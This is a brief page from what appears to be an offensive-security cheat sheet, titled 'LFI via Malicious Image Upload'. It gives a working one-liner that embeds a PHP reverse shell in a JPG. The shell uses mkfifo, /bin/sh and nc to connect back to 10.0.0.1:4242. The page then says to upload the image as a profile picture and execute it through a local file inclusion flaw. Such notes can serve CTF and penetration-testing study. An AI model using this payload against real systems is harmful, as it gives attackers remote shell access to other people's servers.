>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Initial Access / LFI via Malicious Image Upload

LFI via Malicious Image Upload

Initial Access Web Attacks linux

Embed PHP into a JPG file

echo '<?php system("rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f") ?>' | cat - background.jpg > evil.jpg

Upload as a profile picture, then include it via the LFI vector.